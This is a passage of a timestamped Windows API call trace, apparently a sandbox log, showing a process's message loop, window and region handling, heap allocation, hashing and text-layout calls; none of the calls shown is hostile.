[0176.769] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 0 [0176.769] QueryPerformanceCounter (in: lpPerformanceCount=0x19a3bc | out: lpPerformanceCount=0x19a3bc*=3099558778491) returned 1 [0176.769] NtdllDefWindowProc_W () returned 0x0 [0176.769] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0176.769] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0176.769] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0176.769] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0176.769] GetAncestor (hwnd=0x103e2, gaFlags=0x2) returned 0x103e0 [0176.769] IsIconic (hWnd=0x103e0) returned 0 [0176.769] GetCurrentThreadId () returned 0xb48 [0176.769] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0176.770] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0176.770] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0176.770] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a1a8 | out: lpPoint=0x19a1a8) returned 1 [0176.770] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.770] GetCurrentThreadId () returned 0xb48 [0176.771] GetCurrentThreadId () returned 0xb48 [0176.771] GetFocus () returned 0x0 [0176.771] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x19a197) returned 0 [0176.771] GetCurrentThreadId () returned 0xb48 [0176.771] QueryPerformanceCounter (in: lpPerformanceCount=0xd11de0 | out: lpPerformanceCount=0xd11de0*=3099559033614) returned 1 [0176.771] GetCurrentThreadId () returned 0xb48 [0176.771] GetCurrentThreadId () returned 0xb48 [0176.771] GetCurrentThreadId () returned 0xb48 [0176.772] QueryPerformanceCounter (in: lpPerformanceCount=0x19a1d8 | out: lpPerformanceCount=0x19a1d8*=3099559070129) returned 1 [0176.772] QueryPerformanceCounter (in: lpPerformanceCount=0x19a1a8 | out: lpPerformanceCount=0x19a1a8*=3099559076492) returned 1 [0176.772] QueryPerformanceCounter (in: lpPerformanceCount=0x19a12c | out: lpPerformanceCount=0x19a12c*=3099559085549) returned 1 [0176.772] QueryPerformanceCounter (in: lpPerformanceCount=0x19a118 | out: lpPerformanceCount=0x19a118*=3099559097637) returned 1 [0176.772] QueryPerformanceCounter (in: lpPerformanceCount=0x19a0bc | out: lpPerformanceCount=0x19a0bc*=3099559103669) returned 1 [0176.772] GetClientRect (in: hWnd=0x103e2, lpRect=0x19a240 | out: lpRect=0x19a240) returned 1 [0176.773] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0176.773] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0176.773] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0176.773] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0176.774] KillTimer (hWnd=0x30316, uIDEvent=0x2024) returned 1 [0176.774] QueryPerformanceCounter (in: lpPerformanceCount=0x19a23c | out: lpPerformanceCount=0x19a23c*=3099559297034) returned 1 [0176.774] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0176.774] GetFocus () returned 0x0 [0176.774] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x19a147) returned 0 [0176.776] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.776] GetClientRect (in: hWnd=0x103e2, lpRect=0xcfcea4 | out: lpRect=0xcfcea4) returned 1 [0176.777] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.777] QueryPerformanceCounter (in: lpPerformanceCount=0x199d00 | out: lpPerformanceCount=0x199d00*=3099559567477) returned 1 [0176.777] GetDCEx (hWnd=0x103e2, hrgnClip=0x0, flags=0x12) returned 0x4010197 [0176.777] CreateRectRgnIndirect (lprect=0x199ca0) returned 0x1b040a78 [0176.777] MapWindowPoints (in: hWndFrom=0x103e2, hWndTo=0x0, lpPoints=0x199ce0, cPoints=0x1 | out: lpPoints=0x199ce0) returned 21823995 [0176.777] GetRandomRgn (hdc=0x4010197, hrgn=0x1b040a78, i=4) returned 1 [0176.777] OffsetRgn (hrgn=0x1b040a78, x=-507, y=-333) returned 2 [0176.777] MapWindowPoints (in: hWndFrom=0x103e2, hWndTo=0x0, lpPoints=0x199cf0, cPoints=0x1 | out: lpPoints=0x199cf0) returned 21823995 [0176.777] GetRegionData (in: hrgn=0x1b040a78, nCount=0x0, lpRgnData=0x0 | out: lpRgnData=0x0) returned 0x30 [0176.777] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x30) returned 0x9f6c2d8 [0176.777] GetRegionData (in: hrgn=0x1b040a78, nCount=0x30, lpRgnData=0x9f6c2d8 | out: lpRgnData=0x9f6c2d8) returned 0x30 [0176.778] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.778] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f6c2d8 | out: hHeap=0x5e0000) returned 1 [0176.778] DeleteObject (ho=0x1b040a78) returned 1 [0176.778] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x30) returned 0x9f6c4d0 [0176.778] ExtCreateRegion (lpx=0x0, nCount=0x30, lpData=0x9f6c4d0) returned 0x92040a6c [0176.778] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f6c4d0 | out: hHeap=0x5e0000) returned 1 [0176.778] SelectClipRgn (hdc=0x4010197, hrgn=0x92040a6c) returned 2 [0176.778] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x30) returned 0x9f6c1c0 [0176.778] ExtCreateRegion (lpx=0x0, nCount=0x30, lpData=0x9f6c1c0) returned 0x29040a81 [0176.778] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f6c1c0 | out: hHeap=0x5e0000) returned 1 [0176.778] ValidateRgn (hWnd=0x103e2, hRgn=0x29040a81) returned 1 [0176.778] DeleteObject (ho=0x92040a6c) returned 1 [0176.779] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.779] GetClientRect (in: hWnd=0x103e2, lpRect=0x199bf8 | out: lpRect=0x199bf8) returned 1 [0176.780] GetSysColor (nIndex=15) returned 0xf0f0f0 [0176.781] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x7c) returned 0x68caf8 [0176.781] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830e8 [0176.781] HashData (in: pbData=0x9f830e8, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0176.781] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0176.781] HashData (in: pbData=0x9f830ec, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0176.781] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830e8 | out: hHeap=0x5e0000) returned 1 [0176.781] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f20 [0176.781] HashData (in: pbData=0x9f82f20, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0176.781] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0176.781] HashData (in: pbData=0x9f82f24, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0176.781] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f20 | out: hHeap=0x5e0000) returned 1 [0176.781] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f831a8 [0176.781] HashData (in: pbData=0x9f831a8, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0176.781] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0176.781] HashData (in: pbData=0x9f831ac, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0176.781] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f831a8 | out: hHeap=0x5e0000) returned 1 [0176.782] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f831a8 [0176.782] HashData (in: pbData=0x9f831a8, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0176.782] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0176.782] HashData (in: pbData=0x9f831ac, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0176.782] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f831a8 | out: hHeap=0x5e0000) returned 1 [0176.782] GetSysColor (nIndex=15) returned 0xf0f0f0 [0176.782] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83190 [0176.782] HashData (in: pbData=0x9f83190, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0176.782] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0176.782] HashData (in: pbData=0x9f83194, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0176.783] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83190 | out: hHeap=0x5e0000) returned 1 [0176.783] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f68 [0176.783] HashData (in: pbData=0x9f82f68, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0176.783] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0176.783] HashData (in: pbData=0x9f82f6c, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0176.783] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f68 | out: hHeap=0x5e0000) returned 1 [0176.783] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830e8 [0176.783] HashData (in: pbData=0x9f830e8, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0176.783] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0176.783] HashData (in: pbData=0x9f830ec, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0176.783] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830e8 | out: hHeap=0x5e0000) returned 1 [0176.783] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f50 [0176.783] HashData (in: pbData=0x9f82f50, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0176.783] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0176.783] HashData (in: pbData=0x9f82f54, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0176.783] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f50 | out: hHeap=0x5e0000) returned 1 [0176.783] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830d0 [0176.784] HashData (in: pbData=0x9f830d0, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0176.784] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0176.784] HashData (in: pbData=0x9f830d4, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0176.784] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830d0 | out: hHeap=0x5e0000) returned 1 [0176.784] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f831a8 [0176.784] HashData (in: pbData=0x9f831a8, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0176.784] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0176.784] HashData (in: pbData=0x9f831ac, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0176.784] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f831a8 | out: hHeap=0x5e0000) returned 1 [0176.784] GetSysColor (nIndex=15) returned 0xf0f0f0 [0176.784] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82ff8 [0176.785] HashData (in: pbData=0x9f82ff8, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0176.785] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0176.785] HashData (in: pbData=0x9f82ffc, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0176.785] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82ff8 | out: hHeap=0x5e0000) returned 1 [0176.785] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830a0 [0176.785] HashData (in: pbData=0x9f830a0, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0176.785] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0176.785] HashData (in: pbData=0x9f830a4, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0176.785] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830a0 | out: hHeap=0x5e0000) returned 1 [0176.785] LsSetDoc () returned 0x0 [0176.785] LsCreateLine () returned 0x0 [0176.785] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.785] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.786] LsdnFinishRegular () returned 0x0 [0176.786] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.786] LsdnFinishRegular () returned 0x0 [0176.786] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.786] LsDisplayLine () returned 0x0 [0176.786] IOleInPlaceFrame:SetMenu (This=0xd90d60, hmenuShared=0x1004, holemenu=0x0, hwndActiveObject=0x1) returned 0x0 [0176.786] IOleInPlaceFrame:SetMenu (This=0xd90d40, hmenuShared=0x1004, holemenu=0x0, hwndActiveObject=0x0) returned 0x0 [0176.787] GetSysColor (nIndex=8) returned 0x0 [0176.787] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.788] GetSysColor (nIndex=8) returned 0x0 [0176.788] LsDestroyLine () returned 0x0 [0176.788] IOleInPlaceSite:CanInPlaceActivate (This=0xcfa380) returned 0x0 [0176.788] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ce0 [0176.788] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83160 [0176.788] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7af8 [0176.789] HashData (in: pbData=0x9f83164, cbData=0x4, pbHash=0x9f83168, cbHash=0x2 | out: pbHash=0x9f83168) returned 0x0 [0176.789] HashData (in: pbData=0x6d7af8, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.789] HashData (in: pbData=0x6d7afa, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.789] HashData (in: pbData=0x6d7afc, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.789] HashData (in: pbData=0x6d7b04, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.789] HashData (in: pbData=0x6d7b0c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.789] HashData (in: pbData=0x6d7b14, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.789] HashData (in: pbData=0x6d7b16, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.789] HashData (in: pbData=0x6d7b18, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.789] HashData (in: pbData=0x6d7b20, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.789] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0176.789] HashData (in: pbData=0x6d7b2c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.789] HashData (in: pbData=0x6d7b34, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.789] HashData (in: pbData=0x6d7b40, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.789] HashData (in: pbData=0x6d7b44, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.789] HashData (in: pbData=0x6d7b4c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.789] HashData (in: pbData=0x6d7b58, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.789] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7af8 | out: hHeap=0x5e0000) returned 1 [0176.789] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83160 | out: hHeap=0x5e0000) returned 1 [0176.789] HashData (in: pbData=0x9ee6ce0, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0176.790] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0176.790] HashData (in: pbData=0x9ee6ce4, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0176.790] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ce0 | out: hHeap=0x5e0000) returned 1 [0176.790] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ce0 [0176.790] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f50 [0176.790] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7708 [0176.790] HashData (in: pbData=0x9f82f54, cbData=0x4, pbHash=0x9f82f58, cbHash=0x2 | out: pbHash=0x9f82f58) returned 0x0 [0176.790] HashData (in: pbData=0x6d7708, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.790] HashData (in: pbData=0x6d770a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.790] HashData (in: pbData=0x6d770c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.790] HashData (in: pbData=0x6d7714, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.790] HashData (in: pbData=0x6d771c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.790] HashData (in: pbData=0x6d7724, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.790] HashData (in: pbData=0x6d7726, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.791] HashData (in: pbData=0x6d7728, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.791] HashData (in: pbData=0x6d7730, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.791] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0176.792] HashData (in: pbData=0x6d773c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.792] HashData (in: pbData=0x6d7744, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.792] HashData (in: pbData=0x6d7750, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.792] HashData (in: pbData=0x6d7754, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.792] HashData (in: pbData=0x6d775c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.792] HashData (in: pbData=0x6d7768, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.792] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7708 | out: hHeap=0x5e0000) returned 1 [0176.792] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f50 | out: hHeap=0x5e0000) returned 1 [0176.792] HashData (in: pbData=0x9ee6ce0, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0176.792] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0176.792] HashData (in: pbData=0x9ee6ce4, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0176.792] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ce0 | out: hHeap=0x5e0000) returned 1 [0176.792] GetFocus () returned 0x0 [0176.792] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x19795f) returned 0 [0176.793] GetFocus () returned 0x0 [0176.793] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x19796b) returned 0 [0176.793] GetSysColor (nIndex=15) returned 0xf0f0f0 [0176.793] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7a88 | out: hHeap=0x5e0000) returned 1 [0176.794] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7778 [0176.794] _CIsqrt () returned 0x407b027f [0176.794] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ce0 [0176.794] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.794] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.794] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ce0 | out: hHeap=0x5e0000) returned 1 [0176.794] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x54) returned 0x6dd7d8 [0176.794] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.794] HashData (in: pbData=0xd952c0, cbData=0x28, pbHash=0x19732c, cbHash=0x4 | out: pbHash=0x19732c) returned 0x0 [0176.795] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dd7d8 | out: hHeap=0x5e0000) returned 1 [0176.795] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ce0 [0176.795] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f98 [0176.795] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d77e8 [0176.795] HashData (in: pbData=0x9f82f9c, cbData=0x4, pbHash=0x9f82fa0, cbHash=0x2 | out: pbHash=0x9f82fa0) returned 0x0 [0176.796] HashData (in: pbData=0x6d77e8, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.796] HashData (in: pbData=0x6d77ea, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.796] HashData (in: pbData=0x6d77ec, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.796] HashData (in: pbData=0x6d77f4, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.796] HashData (in: pbData=0x6d77fc, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.796] HashData (in: pbData=0x6d7804, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.796] HashData (in: pbData=0x6d7806, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.796] HashData (in: pbData=0x6d7808, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.796] HashData (in: pbData=0x6d7810, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.796] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0176.796] HashData (in: pbData=0x6d781c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.796] HashData (in: pbData=0x6d7824, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.796] HashData (in: pbData=0x6d7830, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.796] HashData (in: pbData=0x6d7834, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.796] HashData (in: pbData=0x6d783c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.796] HashData (in: pbData=0x6d7848, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.796] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d77e8 | out: hHeap=0x5e0000) returned 1 [0176.796] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f98 | out: hHeap=0x5e0000) returned 1 [0176.796] HashData (in: pbData=0x9ee6ce0, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0176.796] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0176.796] HashData (in: pbData=0x9ee6ce4, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0176.796] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ce0 | out: hHeap=0x5e0000) returned 1 [0176.797] GetFocus () returned 0x0 [0176.797] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x197acf) returned 0 [0176.797] GetFocus () returned 0x0 [0176.797] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x197a8b) returned 0 [0176.797] GetFocus () returned 0x0 [0176.797] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x197a97) returned 0 [0176.797] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0176.797] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 